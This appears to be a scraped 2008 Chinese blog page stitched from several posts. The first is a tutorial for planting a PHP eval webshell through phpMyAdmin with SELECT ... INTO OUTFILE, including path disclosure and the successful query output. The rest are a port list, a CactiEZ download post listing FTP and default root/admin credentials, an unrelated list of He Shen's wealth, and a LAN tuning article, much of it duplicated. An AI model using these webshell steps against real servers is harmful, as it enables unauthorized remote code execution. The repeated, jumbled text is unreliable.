phpMyAdmin 后台拿webshell
[ 2008/09/22 12:41 | by selboo ]
1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
您运行的 SQL 语句已经成功运行了。
SQL 查询:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影响列数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影响列数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
Linux,Unix下各端口列表汇总篇
[ 2008/09/22 12:39 | by selboo ]
Linux常用端口
1 tcpmux TCP 端口服务多路复用
5 rje 远程作业入口
7 echo Echo 服务
9 discard 用于连接测试的空服务
11 systat 用于列举连接了的端口的系统状态
13 daytime 给请求主机发送日期和时间
17 qotd 给连接了的主机发送每日格言
18 msp 消息发送协议
19 chargen 字符生成服务;发送无止境的字符流
20 ftp-data FTP 数据端口
21 ftp 文件传输协议(FTP)端口;有时被文件服务协议(FSP)使用
22 ssh 安全 Shell(SSH)服务
23 telnet Telnet 服务
25 smtp 简单邮件传输协议(SMTP)
37 time 时间协议
39 rlp 资源定位协议
42 nameserver 互联网名称服务
43 nicname WHOIS 目录服务
49 tacacs 用于基于 TCP/IP 验证和访问的终端访问控制器访问控制系统
50 re-mail-ck 远程邮件检查协议
53 domain 域名服务(如 BIND)
63 whois++ WHOIS++,被扩展了的 WHOIS 服务
67 bootps 引导协议(BOOTP)服务;还被动态主机配置协议(DHCP)服务使用
68 bootpc Bootstrap(BOOTP)客户;还被动态主机配置协议(DHCP)客户使用
69 tftp 小文件传输协议(TFTP)
70 gopher Gopher 互联网文档搜寻和检索
71 netrjs-1 远程作业服务
72 netrjs-2 远程作业服务
73 netrjs-3 远程作业服务
73 netrjs-4 远程作业服务
79 finger 用于用户联系信息的 Finger 服务
80 http 用于万维网(WWW)服务的超文本传输协议(HTTP)
88 kerberos Kerberos 网络验证系统
95 supdup Telnet 协议扩展
101 hostname SRI-NIC 机器上的主机名服务
102 iso-tsap ISO 开发环境(ISODE)网络应用
105 csnet-ns 邮箱名称服务器;也被 CSO 名称服务器使用
107 rtelnet 远程 Telnet
109 pop2 邮局协议版本2
110 pop3 邮局协议版本3
111 sunrpc 用于远程命令执行的远程过程调用(RPC)协议,被网络文件系统(NFS)使用
113 auth 验证和身份识别协议
115 sftp 安全文件传输协议(SFTP)服务
117 uucp-path Unix 到 Unix 复制协议(UUCP)路径服务
119 nntp 用于 USENET 讨论系统的网络新闻传输协议(NNTP)
123 ntp 网络时间协议(NTP)
137 netbios-ns 在红帽企业 Linux 中被 Samba 使用的 NETBIOS 名称服务
138 netbios-dgm 在红帽企业 Linux 中被 Samba 使用的 NETBIOS 数据报服务
139 netbios-ssn 在红帽企业 Linux 中被 Samba 使用的NET BIOS 会话服务
143 imap 互联网消息存取协议(IMAP)
161 snmp 简单网络管理协议(SNMP)
162 snmptrap SNMP 的陷阱
163 cmip-man 通用管理信息协议(CMIP)
164 cmip-agent 通用管理信息协议(CMIP)
174 mailq MAILQ
177 xdmcp X 显示管理器控制协议
178 nextstep NeXTStep 窗口服务器
179 bgp 边界网络协议
191 prospero Cliffod Neuman 的 Prospero 服务
194 irc 互联网中继聊天(IRC)
199 smux SNMP UNIX 多路复用
201 at-rtmp AppleTalk 选路
202 at-nbp AppleTalk 名称绑定
204 at-echo AppleTalk echo 服务
206 at-zis AppleTalk 区块信息
209 qmtp 快速邮件传输协议(QMTP)
210 z39.50 NISO Z39.50 数据库
213 ipx 互联网络分组交换协议(IPX),被 Novell Netware 环境常用的数据报协议
220 imap3 互联网消息存取协议版本3
245 link LINK
347 fatserv Fatmen 服务器
363 rsvp_tunnel RSVP 隧道
369 rpc2portmap Coda 文件系统端口映射器
370 codaauth2 Coda 文件系统验证服务
372 ulistproc UNIX Listserv
389 ldap 轻型目录存取协议(LDAP)
427 svrloc 服务位置协议(SLP)
434 mobileip-agent 可移互联网协议(IP)代理
435 mobilip-mn 可移互联网协议(IP)管理器
443 https 安全超文本传输协议(HTTP)
444 snpp 小型网络分页协议
445 microsoft-ds 通过 TCP/IP 的服务器消息块(SMB)
464 kpasswd Kerberos 口令和钥匙改换服务
468 photuris Photuris 会话钥匙管理协议
487 saft 简单不对称文件传输(SAFT)协议
488 gss-http 用于 HTTP 的通用安全服务(GSS)
496 pim-rp-disc 用于协议独立的多址传播(PIM)服务的会合点发现(RP-DISC)
500 isakmp 互联网安全关联和钥匙管理协议(ISAKMP)
535 iiop 互联网内部对象请求代理协议(IIOP)
538 gdomap GNUstep 分布式对象映射器(GDOMAP)
546 dhcpv6-client 动态主机配置协议(DHCP)版本6客户
547 dhcpv6-server 动态主机配置协议(DHCP)版本6服务
554 rtsp 实时流播协议(RTSP)
563 nntps 通过安全套接字层的网络新闻传输协议(NNTPS)
565 whoami whoami
587 submission 邮件消息提交代理(MSA)
610 npmp-local 网络外设管理协议(NPMP)本地 / 分布式排队系统(DQS)
611 npmp-gui 网络外设管理协议(NPMP)GUI / 分布式排队系统(DQS)
612 hmmp-ind HMMP 指示 / DQS
631 ipp 互联网打印协议(IPP)
636 ldaps 通过安全套接字层的轻型目录访问协议(LDAPS)
674 acap 应用程序配置存取协议(ACAP)
694 ha-cluster 用于带有高可用性的群集的心跳服务
749 kerberos-adm Kerberos 版本5(v5)的“kadmin”数据库管理
750 kerberos-iv Kerberos 版本4(v4)服务
765 webster 网络词典
767 phonebook 网络电话簿
873 rsync rsync 文件传输服务
992 telnets 通过安全套接字层的 Telnet(TelnetS)
993 imaps 通过安全套接字层的互联网消息存取协议(IMAPS)
994 ircs 通过安全套接字层的互联网中继聊天(IRCS)
995 pop3s 通过安全套接字层的邮局协议版本3(POPS3)
UNIX 特有的端口
512/tcp exec 用于对远程执行的进程进行验证
512/udp biff [comsat] 异步邮件客户(biff)和服务(comsat)
513/tcp login 远程登录(rlogin)
513/udp who [whod] 登录的用户列表
514/tcp shell [cmd] 不必登录的远程 shell(rshell)和远程复制(rcp)
514/udp syslog UNIX 系统日志服务
515 printer [spooler] 打印机(lpr)假脱机
517/udp talk 远程对话服务和客户
518/udp ntalk 网络交谈(ntalk),远程对话服务和客户
519 utime [unixtime] UNIX 时间协议(utime)
520/tcp efs 扩展文件名服务器(EFS)
520/udp router [route, routed] 选路信息协议(RIP)
521 ripng 用于互联网协议版本6(IPv6)的选路信息协议
525 timed [timeserver] 时间守护进程(timed)
526/tcp tempo [newdate] Tempo
530/tcp courier [rpc] Courier 远程过程调用(RPC)协议
531/tcp conference [chat] 互联网中继聊天
532 netnews Netnews
533/udp netwall 用于紧急广播的 Netwall
540/tcp uucp [uucpd] Unix 到 Unix 复制服务
543/tcp klogin Kerberos 版本5(v5)远程登录
544/tcp kshell Kerberos 版本5(v5)远程 shell
548 afpovertcp 通过传输控制协议(TCP)的 Appletalk 文件编制协议(AFP)
556 remotefs [rfs_server, rfs] Brunhoff 的远程文件系统(RFS)
CactiEZ中文版横空出世
[ 2008/09/21 23:39 | by selboo ]
网通用户下载:
http://www.ipkernel.com/CactiEZ/CactiEZ_SC8.iso
电信用户下载:
ftp://cuer:cuer@125.65.112.55/CactiEZ_SC8.iso
root密码: CactiEZ
Cacti登录用户: admin
Cacti登录密码: admin
第一次登录会要求修改密码的
改IP: system-config-network命令, 或修改: /etc/sysconfig/network-scripts/ifcfg-ethX[网卡编号]
改DNS: 修改: /etc/resolv.conf
改网关: 修改: /etc/sysconfig/network, 加入 GATEWAY=[IP]
房屋3000间 大金元宝100个(一千两一个)
田地8000顷 小银元宝56600个(一百两一个)
银铺42处 银锭900万个
当铺75处 洋钱58000元
当铺75处 制钱150万文
赤(足)金60000两 大蓝宝石40块
吉林人参600余斤 银碗40桌
玉如意1200余柄 珊瑚树11支
珍珠手串230串 绸缎纱罗共14300匹
桂圆大珍珠10粒 毛呢哔叽20000板
大红宝石10块 狐皮550张
貂皮850张 粗细皮56000张
铜锡器361000件 名贵瓷器10万件
镂金八宝炕床24座 西洋钟460座
四季好衣服7000件 家人606名
妇女600名
总编号为106号
已估计的为26号价值两亿六千四百万两
剩余83号没有估计,按现在估计来看又应该有8亿多两。
一共有11亿两
每年国库7000万
相当于15年清朝国库总收入。
和珅死前作的诗
五十年来梦幻真
今朝撒手谢红尘
他日水泛含龙日
认取香烟是后身
田地8000顷 小银元宝56600个(一百两一个)
银铺42处 银锭900万个
当铺75处 洋钱58000元
当铺75处 制钱150万文
赤(足)金60000两 大蓝宝石40块
吉林人参600余斤 银碗40桌
玉如意1200余柄 珊瑚树11支
珍珠手串230串 绸缎纱罗共14300匹
桂圆大珍珠10粒 毛呢哔叽20000板
大红宝石10块 狐皮550张
貂皮850张 粗细皮56000张
铜锡器361000件 名贵瓷器10万件
镂金八宝炕床24座 西洋钟460座
四季好衣服7000件 家人606名
妇女600名
总编号为106号
已估计的为26号价值两亿六千四百万两
剩余83号没有估计,按现在估计来看又应该有8亿多两。
一共有11亿两
每年国库7000万
相当于15年清朝国库总收入。
和珅死前作的诗
五十年来梦幻真
今朝撒手谢红尘
他日水泛含龙日
认取香烟是后身
优化网络性能为局域网络提速
[ 2008/09/21 21:08 | by selboo ]
目前,几乎任何稍微大一点的企业和学校都会建立一个局域网供使用,网络已经无处不在了.作为局域网络的网管人员,对于网络速度是非常在乎的,如何有效的利用带宽,避免不必要的速度损失,从而达到对整个网络的优化,就是一个非常重要的问题.
本文试图讨论关于影响企业网络性能的一些因素,希望能够对读者有所帮助.
一、设计的成败
设计决定了整个网络的速度.一个好的网络整体规划设计不但能够满足性能的要求,而且使用了最少的投入,同时还应该便于支持日后对于网络的扩大处理.网络设计是一个非常大的课题,从交换机和路由器的选择和配置,到综合排线,都有许多的学问.笔者的个人建议是,请一名非常经验非常丰富的设计人员或者雇用网络排线公司是一个企业公司最初建网的最好选择.笔者早期的切身经验是,同样的设备,存在两种不同的连线法,按照理论是二者是等价的,但是无论怎么试,就是连不上网,后来一位高手只是稍微改动了一根线的位置,就连通了.好多时候,经验远比书本上的知识重要.
通常,好的设计满足一下几个要求:
功能性:这个网络必须能够工作.它要使得用户能够满足工作上的需要,必须以合理的速度和可靠性为用户提供"用户到用户"和"用户到应用"的连接.
可扩展性:这个网络应该能够增长.最初的设计应能在不对全局做较大改动的情况下使网络增长.
适应性:这个网络在设计时应该具有长远的目光,考虑到未来技术的发展.并且,不应该包含限制新技术在网络中开展的因素.
易管理性:应该支持网络监控和管理,以保证运行中的持续稳定.
二、服务、服务器与QoS
企业网的稳定与否往往决定于一些关键性的服务器和服务是否稳定运行.通常,在一个现代的企业中,都会使用一些MIS、ERP系统对企业进行管理.在一些大型企业中,甚至实现了完全基于计算机信息系统的管理和运作.所以,为了保证整个企业能够顺利的运作,网管就必须不惜一切代价保证这些信息系统的稳定运行.
一般的企业管理信息系统大都使用B/S(如SAP)和C/S(J2EE和.NET)构架.无论何种构架,一台高档的服务器是不可少的.现代的技术如J2EE等虽然稳定可靠,但服务器的负载是早期的数倍.通过使用双或四Xeon处理器,SCSI接口的硬盘,RAID阵列或者增大内存都能够大大提高服务器的性能.同时,为服务器买一块名牌网卡或者升级至千兆以太网而不是2、30元的“地摊货”也是很好的方法.当然,鉴于Oracle、BEA、IBM等对于Linux最近都增加了支持力度,所有的产品都有移植到Linux平台,而Linux在服务方面的特性确实要好一些,所以用户不妨考虑Linux平台.如果公司的规模非常大,那么使用IBM、HP等大厂的服务器和完整解决方案远胜于一台你认为很好的普通服务器.
QoS是最近交换机和软件厂商等倡导的一项技术,QoS能够保证企业关键性的服务稳定,通过在交换机中保留一定的带宽给关键服务数据包,关键服务的性能能够得到保证.但是,QoS的开启意味着20%以上的普通网络通讯速度流失,所以对于企业网和网上业务密集的网络,开启QoS,否则,关掉它.
三、路由、交换
交换机和路由的配置也是非常重要的网络性能因素.
先说交换机的配置,通常对于最常见的提高性能的方法是设置VLAN.VLAN是把物理上通过同等方式的连接虚拟成为多个不同的子网.VLAN最大的功能就是防止广播风暴.一般来说,如果一个网络的广播包占到所有的通讯包的30%以上,网络性能就显著下降.现在,几乎所有的交换机都提供了VLAN的支持.虽然VLAN设置有一点点的麻烦,但是因为其对于性能的显著提高,建议网管能够配置VLAN.把互访频率比较高的电脑设置在同一个VLAN中,把无关性大的电脑隔开,性能的提高将是明显的.另外,打开网卡和交换机的全双工支持,也能带来性能的提高.同时,不同的交换机网络(Cisco和3COM等),都有自己的交换机专利技术能够提高速度.
路由器的功能是连接两个不同的网络,对于中小企业通常是连接在最上层交换机上作为Internet和局域网的网桥,路由器是一个异常复杂与高级的机器.当然,路由器非常贵,如果中小企业对于Internet性能要求不高,可以简单的通过安装建立一台Windows Internet Access Server作为连接Internet服务器,或者依靠便宜好用的Linux机器作为软路由,更或者在一台连接Internet和局域网的电脑上安装一个代理服务器软件(Microsoft Proxy Server/Unix Squid).但是,路由器功能是非常强大的,而且具有非常好的速度.所以,在可以的情况下,一个企业应该尽量选择购买路由器,并且购买速度足够满足企业要求的路由器.路由协议一般就是连接ISP的PPP,配置上没有太多的可改进之处,一部分路由器支持ACL访问控制,通过合理的配置能够屏蔽一部分的流量,增加了网络带宽.
四、瓶颈、流量
网管必须经常嗅探网上包的情况,了解究竟什么东西在网上传输.如果企业中有员工在使用例如网上视频点播或者BitTorrent等P2P软件的时候,对于网络带宽,尤其是局域网出口带宽,会带来巨大的影响.笔者所在的学校,这一年来上网人数没有增加太多,但是访问公网的速度大大变慢了,就是因为这一类点对点的连结大大增多了.如果企业业务非常在乎与Internet的信息交换,那么网管就必须提醒用户或者干脆在防火墙上屏蔽掉BitTorrent 之类的软件保证正常的企业信息通道畅通.
通过向Internet服务提供商购买更多的带宽线路,或者提供高一级的高速交换机,可以解决大部分的瓶颈问题.但是,笔者认为,关键是要利用现有的带宽.比如对于视频点播,如果使用基于Cisco交换技术的IPTV的软件,就能够很好的解决内部的视频网络瓶颈.
五、安全再安全
外界的网络对于内部的DoS攻击,端口扫描对于企业网络的影响非常大.所以,安装一个防火墙或者购买一个硬件防火墙,总是能够解决许多的网络问题.尤其是现在的黑客工具繁多,而且很好用,还有杂志宣传如何使用,所以网络所受到的潜在危险是巨大的(悲哀啊).而且,网管必须对局域网中的电脑进行扫描,看看是不是被黑客开了后门,时常看看Log日志,对于异常要警觉.当然,最重要的是必须时刻关注最新的软件升级信息,订阅安全邮件列表.
其次,内贼难防.所以对于交换机和路由机的密码,必须高度保密,对于网络的拓扑结构,也要尽量保密.关掉路由和交换机的http管理服务.对于重要的数据服务单元,如SQL Server、MySQL服务器,可以把它同局域网断开,仅和需要的主机连接成一个单独的子网,或者,安装防火墙软件,只允许固定的IP地址访问.
总之,对于突然的网络流量剧变,必须引起安全性方面的高度注意.
802.1x
该协议能够对于连接入网络的电脑进行身份认证,避免有人偷连网络,大部分交换机支持该协议,建议推广使用.
六、细节
连线:连接局域网中的每台计算机都是用双绞线来实现的,但是并不是用双绞线把两台计算机简单地相互连接起来,就能实现通信目的,我们必须按照一定的连线规则来进行连线.双绞线的连接距离不能超过100米,我们如果需要连接超过100米的两台计算机时,必须使用转换设备.在连接转换设备和交换机时,我们还必须进行跳线.这是因为以太网中,一般是使用两对双绞线,排列在1、2、3、6的位置,如果使用的不是两对线,而是将原配对使用的线分开使用,就会形成串扰,对网络性能有较大影响.10M网络环境这种情况不明显,100M的网络环境下如果流量大或者距离长,网络就会无法联通.当然,不要使用劣质的水晶头和线.
严格执行接地要求:由于在局域网中传输的都是一些弱信号,如果操作稍有不当或者没有按照网络设备的具体操作要求来办的话,就可能在联网中出现干扰信息,严重的能导致整个网络不通.特别是一些网络转接设备,由于涉及到远程线路,它对接地的要求非常严格,否则该网络设备将达不到规定的连接速率,从而在联网的过程中产生各种莫名其妙的故障现象.
爱护设备:把交换机组和服务器放在一个灰尘少的房间中,当然如果有中心机房当然最好.经常去看看,扫扫灰.对于散热风扇,最好能够双个备份.对于网线,至少要能够有个头绪,万一接错也能查出来.这些都能够帮助网络正常运作.
本文试图讨论关于影响企业网络性能的一些因素,希望能够对读者有所帮助.
一、设计的成败
设计决定了整个网络的速度.一个好的网络整体规划设计不但能够满足性能的要求,而且使用了最少的投入,同时还应该便于支持日后对于网络的扩大处理.网络设计是一个非常大的课题,从交换机和路由器的选择和配置,到综合排线,都有许多的学问.笔者的个人建议是,请一名非常经验非常丰富的设计人员或者雇用网络排线公司是一个企业公司最初建网的最好选择.笔者早期的切身经验是,同样的设备,存在两种不同的连线法,按照理论是二者是等价的,但是无论怎么试,就是连不上网,后来一位高手只是稍微改动了一根线的位置,就连通了.好多时候,经验远比书本上的知识重要.
通常,好的设计满足一下几个要求:
功能性:这个网络必须能够工作.它要使得用户能够满足工作上的需要,必须以合理的速度和可靠性为用户提供"用户到用户"和"用户到应用"的连接.
可扩展性:这个网络应该能够增长.最初的设计应能在不对全局做较大改动的情况下使网络增长.
适应性:这个网络在设计时应该具有长远的目光,考虑到未来技术的发展.并且,不应该包含限制新技术在网络中开展的因素.
易管理性:应该支持网络监控和管理,以保证运行中的持续稳定.
二、服务、服务器与QoS
企业网的稳定与否往往决定于一些关键性的服务器和服务是否稳定运行.通常,在一个现代的企业中,都会使用一些MIS、ERP系统对企业进行管理.在一些大型企业中,甚至实现了完全基于计算机信息系统的管理和运作.所以,为了保证整个企业能够顺利的运作,网管就必须不惜一切代价保证这些信息系统的稳定运行.
一般的企业管理信息系统大都使用B/S(如SAP)和C/S(J2EE和.NET)构架.无论何种构架,一台高档的服务器是不可少的.现代的技术如J2EE等虽然稳定可靠,但服务器的负载是早期的数倍.通过使用双或四Xeon处理器,SCSI接口的硬盘,RAID阵列或者增大内存都能够大大提高服务器的性能.同时,为服务器买一块名牌网卡或者升级至千兆以太网而不是2、30元的“地摊货”也是很好的方法.当然,鉴于Oracle、BEA、IBM等对于Linux最近都增加了支持力度,所有的产品都有移植到Linux平台,而Linux在服务方面的特性确实要好一些,所以用户不妨考虑Linux平台.如果公司的规模非常大,那么使用IBM、HP等大厂的服务器和完整解决方案远胜于一台你认为很好的普通服务器.
QoS是最近交换机和软件厂商等倡导的一项技术,QoS能够保证企业关键性的服务稳定,通过在交换机中保留一定的带宽给关键服务数据包,关键服务的性能能够得到保证.但是,QoS的开启意味着20%以上的普通网络通讯速度流失,所以对于企业网和网上业务密集的网络,开启QoS,否则,关掉它.
三、路由、交换
交换机和路由的配置也是非常重要的网络性能因素.
先说交换机的配置,通常对于最常见的提高性能的方法是设置VLAN.VLAN是把物理上通过同等方式的连接虚拟成为多个不同的子网.VLAN最大的功能就是防止广播风暴.一般来说,如果一个网络的广播包占到所有的通讯包的30%以上,网络性能就显著下降.现在,几乎所有的交换机都提供了VLAN的支持.虽然VLAN设置有一点点的麻烦,但是因为其对于性能的显著提高,建议网管能够配置VLAN.把互访频率比较高的电脑设置在同一个VLAN中,把无关性大的电脑隔开,性能的提高将是明显的.另外,打开网卡和交换机的全双工支持,也能带来性能的提高.同时,不同的交换机网络(Cisco和3COM等),都有自己的交换机专利技术能够提高速度.
路由器的功能是连接两个不同的网络,对于中小企业通常是连接在最上层交换机上作为Internet和局域网的网桥,路由器是一个异常复杂与高级的机器.当然,路由器非常贵,如果中小企业对于Internet性能要求不高,可以简单的通过安装建立一台Windows Internet Access Server作为连接Internet服务器,或者依靠便宜好用的Linux机器作为软路由,更或者在一台连接Internet和局域网的电脑上安装一个代理服务器软件(Microsoft Proxy Server/Unix Squid).但是,路由器功能是非常强大的,而且具有非常好的速度.所以,在可以的情况下,一个企业应该尽量选择购买路由器,并且购买速度足够满足企业要求的路由器.路由协议一般就是连接ISP的PPP,配置上没有太多的可改进之处,一部分路由器支持ACL访问控制,通过合理的配置能够屏蔽一部分的流量,增加了网络带宽.
四、瓶颈、流量
网管必须经常嗅探网上包的情况,了解究竟什么东西在网上传输.如果企业中有员工在使用例如网上视频点播或者BitTorrent等P2P软件的时候,对于网络带宽,尤其是局域网出口带宽,会带来巨大的影响.笔者所在的学校,这一年来上网人数没有增加太多,但是访问公网的速度大大变慢了,就是因为这一类点对点的连结大大增多了.如果企业业务非常在乎与Internet的信息交换,那么网管就必须提醒用户或者干脆在防火墙上屏蔽掉BitTorrent 之类的软件保证正常的企业信息通道畅通.
通过向Internet服务提供商购买更多的带宽线路,或者提供高一级的高速交换机,可以解决大部分的瓶颈问题.但是,笔者认为,关键是要利用现有的带宽.比如对于视频点播,如果使用基于Cisco交换技术的IPTV的软件,就能够很好的解决内部的视频网络瓶颈.
五、安全再安全
外界的网络对于内部的DoS攻击,端口扫描对于企业网络的影响非常大.所以,安装一个防火墙或者购买一个硬件防火墙,总是能够解决许多的网络问题.尤其是现在的黑客工具繁多,而且很好用,还有杂志宣传如何使用,所以网络所受到的潜在危险是巨大的(悲哀啊).而且,网管必须对局域网中的电脑进行扫描,看看是不是被黑客开了后门,时常看看Log日志,对于异常要警觉.当然,最重要的是必须时刻关注最新的软件升级信息,订阅安全邮件列表.
其次,内贼难防.所以对于交换机和路由机的密码,必须高度保密,对于网络的拓扑结构,也要尽量保密.关掉路由和交换机的http管理服务.对于重要的数据服务单元,如SQL Server、MySQL服务器,可以把它同局域网断开,仅和需要的主机连接成一个单独的子网,或者,安装防火墙软件,只允许固定的IP地址访问.
总之,对于突然的网络流量剧变,必须引起安全性方面的高度注意.
802.1x
该协议能够对于连接入网络的电脑进行身份认证,避免有人偷连网络,大部分交换机支持该协议,建议推广使用.
六、细节
连线:连接局域网中的每台计算机都是用双绞线来实现的,但是并不是用双绞线把两台计算机简单地相互连接起来,就能实现通信目的,我们必须按照一定的连线规则来进行连线.双绞线的连接距离不能超过100米,我们如果需要连接超过100米的两台计算机时,必须使用转换设备.在连接转换设备和交换机时,我们还必须进行跳线.这是因为以太网中,一般是使用两对双绞线,排列在1、2、3、6的位置,如果使用的不是两对线,而是将原配对使用的线分开使用,就会形成串扰,对网络性能有较大影响.10M网络环境这种情况不明显,100M的网络环境下如果流量大或者距离长,网络就会无法联通.当然,不要使用劣质的水晶头和线.
严格执行接地要求:由于在局域网中传输的都是一些弱信号,如果操作稍有不当或者没有按照网络设备的具体操作要求来办的话,就可能在联网中出现干扰信息,严重的能导致整个网络不通.特别是一些网络转接设备,由于涉及到远程线路,它对接地的要求非常严格,否则该网络设备将达不到规定的连接速率,从而在联网的过程中产生各种莫名其妙的故障现象.
爱护设备:把交换机组和服务器放在一个灰尘少的房间中,当然如果有中心机房当然最好.经常去看看,扫扫灰.对于散热风扇,最好能够双个备份.对于网线,至少要能够有个头绪,万一接错也能查出来.这些都能够帮助网络正常运作.
